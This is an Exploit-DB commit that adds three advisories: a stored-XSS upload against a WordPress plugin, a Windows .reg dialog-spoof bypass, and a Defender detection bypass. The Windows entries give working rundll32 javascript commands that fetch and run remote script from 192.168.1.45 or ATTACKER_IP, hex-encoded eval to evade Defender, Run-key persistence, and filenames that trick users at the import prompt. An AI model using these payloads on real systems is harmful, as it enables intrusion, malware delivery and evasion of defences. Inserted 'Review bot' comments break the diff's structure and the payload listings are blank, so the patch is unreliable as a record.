From 00e20a3a1cfd55fd86aba8b9b9b88147b7776280 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 13 Jan 2022 05:01:58 +0000
Subject: [PATCH] DB: 2022-01-13
3 changes to exploits/shellcodes
Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass
Microsoft Windows Defender - Detections Bypass
WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
---
 exploits/php/webapps/50655.txt | 118 +++++++++++++++++
 exploits/windows/local/50653.txt | 215 +++++++++++++++++++++++++++++++
 exploits/windows/local/50654.txt | 118 +++++++++++++++++
 files_exploits.csv | 3 +
 4 files changed, 454 insertions(+)
 create mode 100644 exploits/php/webapps/50655.txt
 create mode 100644 exploits/windows/local/50653.txt
 create mode 100644 exploits/windows/local/50654.txt
diff --git a/exploits/php/webapps/50655.txt b/exploits/php/webapps/50655.txt
new file mode 100644
index 000000000..c808aaff1
--- /dev/null
+++ b/exploits/php/webapps/50655.txt
@@ -0,0 +1,118 @@
+# Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
+# Date: 10/01/2022
+# Exploit Author: Veshraj Ghimire
+# Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/
+# Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/
+# Version: 1.3.2
+# Tested on: Windows 10 - Chrome, WordPress 5.8.2
+# CVE : CVE-2021-24563
+
+# References:
+
+https://www.youtube.com/watch?v=lfrLoHl4-Zs
+https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1
+
+# Description:
+
+The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly
+
+
+# Proof Of Concept:
+
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+
+Accept-Language: en-GB,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Content-Type: multipart/form-data;
+boundary=---------------------------124662954015823207281179831654
+
+Content-Length: 1396
+
+Connection: close
+
+Upgrade-Insecure-Requests: 1
+
+
+-----------------------------124662954015823207281179831654
+
+Content-Disposition: form-data; name="post_ID"
+
+
+1247
+
+-----------------------------124662954015823207281179831654
+
+Content-Disposition: form-data; name="post_title"
+
+
+test
+
+-----------------------------124662954015823207281179831654
+
+Content-Disposition: form-data; name="post_content"
+
+
+test
+
+-----------------------------124662954015823207281179831654
+
+Content-Disposition: form-data; name="files[]"; filename="xss.html"
+
+Content-Type: text/html
+
+
+
+
+-----------------------------124662954015823207281179831654
+
+Content-Disposition: form-data; name="action"
+
+
+upload_ugc
+
+-----------------------------124662954015823207281179831654
+
+Content-Disposition: form-data; 
name="form_layout"
+
+
+image
+
+-----------------------------124662954015823207281179831654
+
+Content-Disposition: form-data; name="fu_nonce"
+
+
+021fb612f9
+
+-----------------------------124662954015823207281179831654
+
+Content-Disposition: form-data; name="_wp_http_referer"
+
+
+/wordpress/frontend-uploader-form/
+
+-----------------------------124662954015823207281179831654
+
+Content-Disposition: form-data; name="ff"
+
+
+92b6cbfa6120e13ff1654e28cef2a271
+
+-----------------------------124662954015823207281179831654
+
+Content-Disposition: form-data; name="form_post_id"
+
+
+1247
+
+-----------------------------124662954015823207281179831654--
+
+
+
+Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html
\ No newline at end of file
diff --git a/exploits/windows/local/50653.txt b/exploits/windows/local/50653.txt
new file mode 100644
index 000000000..f4fc336e2
--- /dev/null
+++ b/exploits/windows/local/50653.txt
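Review bot: The `files[]` part of the proof-of-concept request carries `Content-Type: text/html` but is followed only by blank lines before the next boundary, so the request as printed cannot match its own `Content-Length: 1396`; the uploaded file body appears to have been lost on import, and the entry should state that the listing is omitted rather than present a truncated request as complete. The same blank-listing problem affects the other two files in this commit — `File "backdoor" contents.` and step 3 of `[Exploit/PoC/2022]` in 50653.txt, and the `"hi.tmp"` listing in 50654.txt — so they should be checked at the same time. The closing sentence `Then access the uploaded to trigger the XSS` is missing the word "file". The header names `CVE-2021-24563` and the affected version `1.3.2` but never says whether a fixed release exists, which is the first thing a reader triaging this entry needs; a line under `# References:` recording the fix status would make it actionable.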
@@ -0,0 +1,215 @@
+# Exploit Title: Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass
+# Exploit Author: John Page (aka hyp3rlinx)
+# Website: hyp3rlinx.altervista.org
+# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_REG_FILE_DIALOG_SPOOF_MITIGATION_BYPASS.txt
+# twitter.com/hyp3rlinx
+# ISR: ApparitionSec
+
+[Vendor]
+www.microsoft.com
+
+A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values.
+.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.
+
+
+[Vulnerability Type]
+Windows .Reg File Dialog Spoof - Mitigation Bypass
+
+
+[CVE Reference]
+N/A
+
+[Security Issue]
+Back in 2019 I disclosed a novel way to spoof the Windows registry dialog warning box to display an attacker controlled message.
+This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes to abort" or
+whatever else an attacker would like to display.
+
+This flaw can potentially make users think they are canceling the registry import when they are in fact importing it, as we can make the
+registry security warning dialog box LIE to them as the warning messages are now under an attacker's control.
+
+The way it works is using a specially crafted .Reg filename, this allows control of the registry warning dialog message presented to an end user.
+
+Recently, I noticed in 2022 .Reg file dialog spoof no longer works on Windows 10, but instead triggers an access violation in Regedit.exe.
+Therefore, something has changed in the OS, possibly a silent mitigation hmmm. Wouldn't be the first time, back in 2016 my msinfo32.exe
+.NFO file XXE injection vulnerability report had a similar fate, fixed with no CVE or bulletin and that one allowed remote file access data theft. 
+
+In an threatpost.com interview in 2019, Microsoft stated "The issue submitted does not meet the severity bar for servicing via a security update"
+Reference: https://threatpost.com/windows-bug-spoof-dialog-boxes/142711
+
+However, the "fix" is easily bypassed and the old payload can still be made to work across systems.
+
+Bypassing .Reg spoofing fix was only the start, I had to find ways to bypass two different Windows Defender detections along the way for the PoC.
+
+Trojan:Win32/Powessere.G
+https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427
+
+Backdoor:JS/Relvelshe.A
+https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426
+
+Lets begin...
+
+My original .Reg file spoofing payload of 2019, now triggers an access violation and crashes regedit.exe from invalid pointer read.
+
+00007FFE7A4A7C83 | EB 0D | jmp ntdll.7FFE7A4A7C92 |
+00007FFE7A4A7C85 | FF C9 | dec ecx | ;This loops thru to read in the path + filename
+00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE
+00007FFE7A4A7C8C | 74 08 | je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes
+00007FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
+00007FFE7A4A7C92 | 85 C9 | test ecx,ecx
+
+00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7
+
+ntdll!woutput_l+0x387:
+00007ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:000001ed`00000000=????
+========================================================================================================================================
+
+Online search shows Win-7 still makes up about 22% of the world's computers, so I ask my friend Security researcher Eduardo Braun Prado (Edu_Braun_0day)
+to help me re-test the .REG file spoof on Windows 7 for completeness. 
Turns out my original payload still works on Win-7 and with minor tweaks on Win-10.
+
+Original works on Win-7, but crashes regedit.exe on Win-10:
+Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg
+
+Original payload (first mitigation bypass) works Win-7/Win-10:
+Remove second to last byte (%1) before the %0 string terminator and %b characters Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg
+
+New payload mitigation bypass works on both Win-7 and Win-10:
+Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg
+
+However, we are NOT done yet as we must deal with Windows Defender detection preventions.
+
+1) Trojan:Win32/Powessere.G
+2) Backdoor:JS/Relvelshe.A
+
+Bypassing "Trojan:Win32/Powessere.G"
+=====================================
+Two components required to defeat Trojan:Win32/Powessere.G detection in Windows Defender.
+
+A) extra path traversal when referencing mshtml ..\\..\\..\\
+B) concatenation when constructing the remote server URL scheme "script"+":"+"http.
+
+FAIL on current updated Windows 10
+C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
+Access is denied.
+
+SUCCESSFUL on current updated Windows 10
+Using an extra ..\ results in a bypass, but does nothing useful just an alert box.
+C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(1)
+
+Trying to download and execute remote code using the payload below fails again, as we need the second component URL scheme concat.
+C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.1.45/hi.tmp")
+Access is denied.
+
+Jscript concatenation of the URL scheme.
+document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")
+
+Successfully bypasses "Trojan:Win32/Powessere.G" detection! 
+C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")
+
+Final hurdle we face, Windows defender detects the below downloaded file named "backdoor" as Backdoor:JS/Relvelshe.A and removes it from INetCache.
+"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\backdoor[1]"
+
+File "backdoor" contents.
+
+
+
+
+
+
+
+
+Bypassing "Backdoor:JS/Relvelshe.A" detection.
+==============================================
+The way we do this is to Hex encode our PoC code new ActiveXObject("WScript.Shell").Run("calc.exe")
+Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function.
+
+var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
+var str = '';
+for (var n = 0; n < hex.length; n += 2) {
+str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
+}
+eval(str)
+
+
+Done!, successfully bypassed the .Reg spoof mitigation and two Windows Defender detections. Long Live Windows .Reg file dialog spoofing Flaw!
+
+
+[References]
+Original advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
+https://threatpost.com/windows-bug-spoof-dialog-boxes/142711/
+
+
+[Mitigation Bypass, New PoC Video URL]
+https://www.youtube.com/watch?v=QANX45jieoo
+
+
+[Exploit/PoC/2022]
+Note: The circa 2019 advisory exploit abused "Image File Execution Options" to store the payload as a debugger setting for MSIE.
+Unfortunately, that no longer works, so we will make do for now with storing the payload on disk in a .cmd file and registry Run key.
+
+1) Create a .Reg Dialog Spoofing file named, Sales_Report_2022.%n%nClick YES to cancel%0.reg with below contents
+OR use the original payload with minor alterations. 
Sales_Report_2022.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg
+I prefer the original because the % characters help obscure the obvious wording in the filename.
+
+Windows Registry Editor Version 5.00
+
+[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
+"HATE"="C:\\dump\\s.cmd"
+
+
+2) Create a Windows .cmd file, "s.cmd", with below contents. Unfortunately, it needs to be stored on disk using the path as referenced in the .Reg file above,
+update server IP as required.
+
+rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")
+
+
+3) Create the remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell.
+
+
+
+
+
+
+4) Logout and log back into Windows, BOOM calc.exe runs!
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Original Vendor Notification: March 1, 2019
+Original MSRC Response: " A registry file was created with the title you suggested, but the error message was clear."
+Then vendor sent me a link pointing me to the "Definition of a Security Vulnerability".
+March 10, 2019 : Public Disclosure
+
+Vendor Notification:
+January 10, 2022 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c). 
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/50654.txt b/exploits/windows/local/50654.txt
new file mode 100644
index 000000000..d83cc09be
--- /dev/null
+++ b/exploits/windows/local/50654.txt
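Review bot: The `[Disclosure Timeline]` near the end of the file has an empty `Vendor Notification:` line directly before `January 10, 2022 : Public Disclosure`, so the record does not say whether the 2022 bypass was reported before it was published; the date should be filled in, or the line changed to state plainly that no notification was made. The file also has no `[Mitigation]` section even though it already lists the artifacts this technique leaves behind — the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` value pointing at `C:\\dump\\s.cmd`, a `rundll32.exe javascript:` command line, and a download landing in `INetCache` — and a short section naming those as the things to look for, alongside the note that the spoofed dialog still requires the user to click through, would make the entry useful to the defenders who read this archive.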
@@ -0,0 +1,118 @@
+# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass
+# Exploit Author: John Page (aka hyp3rlinx)
+# Website: hyp3rlinx.altervista.org
+# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
+# twitter.com/hyp3rlinx
+# ISR: ApparitionSec
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows Defender
+
+Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together
+machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in
+your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your
+device and in the cloud.
+
+
+[Vulnerability Type]
+Windows Defender Detection Bypass
+TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
+and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra path traversal when referencing mshtml.
+
+C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
+Access is denied.
+
+Pass an extra "..\" to the path.
+C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)
+
+Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp").
+However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the payload.
+
+C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
+Access is denied.
+
+Full bypass E.g. 
+
+C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
+
+Enter, Backdoor:JS/Relvelshe.A detection.
+
+Windows Defender also prevents downloaded code execution, detected as "Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it hits InetCache.
+"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"
+
+However, this is easily bypassed by Hex encoding our payload code new ActiveXObject("WScript.Shell").Run("calc.exe").
+Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function.
+
+
+[References]
+Trojan:Win32/Powessere.G
+https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427
+
+Backdoor:JS/Relvelshe.A
+https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426
+
+Advisory:
+https://twitter.com/hyp3rlinx/status/1480651583172091904
+
+
+[Exploit/PoC]
+1) Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection.
+
+python -m http.server 80
+
+"hi.tmp"
+
+
+
+
+
+
+2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
+
+
+BOOM!
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+January 10, 2022 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9efb20fbf..976ad4a0a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11430,6 +11430,8 @@ id,file,description,date,author,type,platform,port
 50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
 50642,exploits/windows/local/50642.ps1,"Automox Agent 32 - Local Privilege Escalation",1970-01-01,"Greg Foss",local,windows,
 50650,exploits/windows/local/50650.py,"VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)",1970-01-01,"Bryan Leong",local,windows,
+50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",1970-01-01,hyp3rlinx,local,windows,
+50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
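Review bot: The file's own header line, `# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass`, disagrees with its `[Vulnerability Type]` section, with the advisory's source filename `MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt`, and with the `files_exploits.csv` row added in this same commit, which all describe it as "Microsoft Windows Defender - Detections Bypass"; the title line should be changed to match so that a search on either name finds the same entry. The detection names are also spelled two ways — `TrojanWin32Powessere.G` under `[Vulnerability Type]` and `[Security Issue]` versus `Trojan:Win32/Powessere.G` under `[References]` — and the vendor's form, which is what a defender will look up in Defender alerts, should be used throughout. The `[Disclosure Timeline]` lists only the public disclosure date with no vendor notification entry, so it is not possible to tell from the file whether the vendor was contacted; the timeline should say so explicitly either way.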
@@ -44732,3 +44734,4 @@ id,file,description,date,author,type,platform,port
 50648,exploits/php/webapps/50648.txt,"Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php,
 50649,exploits/php/webapps/50649.txt,"Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php,
 50651,exploits/php/webapps/50651.txt,"Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Dominic Clark",webapps,php,
+50655,exploits/php/webapps/50655.txt,"WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Veshraj Ghimire",webapps,php,